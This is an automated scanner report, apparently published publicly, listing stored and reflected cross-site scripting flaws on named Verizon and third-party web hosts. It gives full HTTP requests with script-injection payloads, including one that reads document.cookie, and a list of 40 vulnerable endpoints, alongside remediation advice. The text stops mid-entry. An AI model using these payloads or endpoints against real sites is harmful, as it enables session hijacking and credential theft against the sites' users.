XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, NYSE:VZ

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://search.verizon.com/ [vsrecentsearches cookie] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.verizon.com
Path:	/

Issue detail

The value of the vsrecentsearches cookie submitted to the URL / is copied into the HTML document as plain text between tags at the URL /. The payload 5d89e<script>alert(1)</script>9b63ecd16e6 was submitted in the vsrecentsearches cookie. This input was returned unmodified in a subsequent request for the URL /.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /?market=94531+zz&q=wss&rv=l&search.x=0&search.y=0&st=zz&tp=l&u1=q HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?tp=l&rv=l&q=xss&search.x=0&search.y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=5d89e<script>alert(1)</script>9b63ecd16e6; CP=null*

Request 2

Response 2

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:18:32 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 70437

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" type="text/css" href="https://www22.verizon.com/in
...[SNIP]...
5d89e<script>alert(1)</script>9b63ecd16e6
...[SNIP]...

1.2. http://www22.verizon.com/residentialhelp/fiostv [ECSPCookies cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/fiostv

Issue detail

The value of the ECSPCookies cookie submitted to the URL /residentialhelp/fiostv is copied into the HTML document as plain text between tags at the URL /residentialhelp/fiostv. The payload 110ed<script>alert(1)</script>af81f92fd39 was submitted in the ECSPCookies cookie. This input was returned unmodified in a subsequent request for the URL /residentialhelp/fiostv.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /residentialhelp/fiostv HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CMS_TimeZoneOffset=300; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm; RecentlyVisited=Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ECSPCookies=Partner=VZO&SolutionCenter=&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(1)</script>af81f92fd39; CP=null*

Request 2

Response 2

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 239446
Expires: Mon, 05 Sep 2011 22:25:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:45 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(1)</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:25:45 GMT; path=/
Set-Cookie: ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:25:44 GMT; path=/
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(1)</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:25:45 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML xmlns:vz>
<HEAD id="ctl00_head"><title>
Verizon | FiOS TV
</title><meta http-equiv="Content-Type" content="text/html;
...[SNIP]...
</strong> 110ed<script>alert(1)</script>af81f92fd39</span>
...[SNIP]...

1.3. http://www22.verizon.com/residentialhelp/phone [ECSPCookies cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residentialhelp/phone

Issue detail

The value of the ECSPCookies cookie submitted to the URL /residentialhelp/phone is copied into the HTML document as plain text between tags at the URL /residentialhelp/phone. The payload 92842<script>alert(1)</script>0f823ca4c89 was submitted in the ECSPCookies cookie. This input was returned unmodified in a subsequent request for the URL /residentialhelp/phone.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; refURL=http://www22.verizon.com/residentialhelp/fiostv; AimsChatURL_Cookie=https://collaborateext.verizon.com; ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd3992842<script>alert(1)</script>0f823ca4c89; CP=null*; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq

Request 2

GET /residentialhelp/phone HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: autosuggest=on; AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; CMS_TimeZoneOffset=300; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; refURL=http://www22.verizon.com/residentialhelp/fiostv; AimsChatURL_Cookie=https://collaborateext.verizon.com; ECSPCookies=Partner=VZO&SolutionCenter=s&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CP=null*; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq

Response 2

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 230585
Expires: Mon, 05 Sep 2011 22:41:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:41:50 GMT
Connection: close
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd3992842<script>alert(1)</script>0f823ca4c89; expires=Wed, 05-Sep-2012 22:41:50 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML xmlns:vz>
<HEAD id="ctl00_head"><title>
Verizon | Local & Long Distance Phone
</title><meta http-equiv="Content-Type"
...[SNIP]...
</script>af81f92fd3992842<script>alert(1)</script>0f823ca4c89</span>
...[SNIP]...

2. Cross-site scripting (reflected) previous next
There are 40 instances of this issue:

http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]
http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]
http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]
https://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]
https://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]
https://collaborateext.verizon.com/aims/encore/VZCTC.serv [Source%20Title parameter]
https://collaborateext.verizon.com/aims/encore/VZCTC.serv [Source%20URL parameter]
https://collaborateext.verizon.com/aims/encore/VZCTC.serv [initQ parameter]
https://collaborateext.verizon.com/aims/encore/VZCTC.serv [lob parameter]
http://gigaom.com/cloud/structure-50/ [REST URL parameter 2]
http://media.verizon.com/media/scripts/widget.ashx [container parameter]
http://media.verizon.com/media/scripts/widget.ashx [widget parameter]
http://r.turn.com/server/beacon_call.js [b2 parameter]
http://s.xp1.ru4.com/meta [ssv_callback parameter]
http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]
http://search.verizon.com/ [name of an arbitrarily supplied request parameter]
https://signin.verizon.com/sso/VOLPortalLogin [goto parameter]
http://syndicate.verizon.net/ads/js.ashx [page parameter]
http://syndicate.verizon.net/ads/js.ashx [pos parameter]
http://syndicate.verizon.net/ads/scripthandler.ashx [source parameter]
http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard [mbox parameter]
http://webmail.verizonemail.net/webmail/servlet/HttpNimletDriver [nimlet parameter]
http://www.addthis.com/bookmark.php [REST URL parameter 1]
http://www.addthis.com/bookmark.php [REST URL parameter 1]
http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
http://www.darkreading.com/security/attacks/showArticle.jhtml [REST URL parameter 2]
http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]
http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter]
http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx [TabValue parameter]
http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx [TabValue parameter]
http://www22.verizon.com/ResidentialHelp/templates/layers/setpreferences_generic.aspx [TabValue parameter]
https://collaborateext.verizon.com/aims/encore/VZCTC.serv [Referer HTTP header]
http://search.verizon.com/ [Referer HTTP header]
http://www.addthis.com/bookmark.php [Referer HTTP header]
http://www.addthis.com/bookmark.php [Referer HTTP header]
http://www.darkreading.com/security/attacks/showArticle.jhtml [User-Agent HTTP header]
http://search.verizon.com/ [vsrecentsearches cookie]
http://www22.verizon.com/residentialhelp/fiostv [ECSPCookies cookie]
http://www22.verizon.com/residentialhelp/phone [ECSPCookies cookie]
http://www22.verizon.com/residentialhelp/phone [vzapps cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

2.1. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f1646(a)2d6783176d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /SMBPortalWeb/appmanager/SMBPortalf1646(a)2d6783176d9/smb HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

2.2. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 89ffe(a)bc4ab16607b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb89ffe(a)bc4ab16607b HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

2.3. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc2a1'-alert(1)-'be3f42647c0 was submitted in the _pageLabel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overviewcc2a1'-alert(1)-'be3f42647c0 HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58

Response

2.4. https://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 707d3(a)c76e008a5a1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb HTTP/1.1
Host: business.verizon.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

2.5. https://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

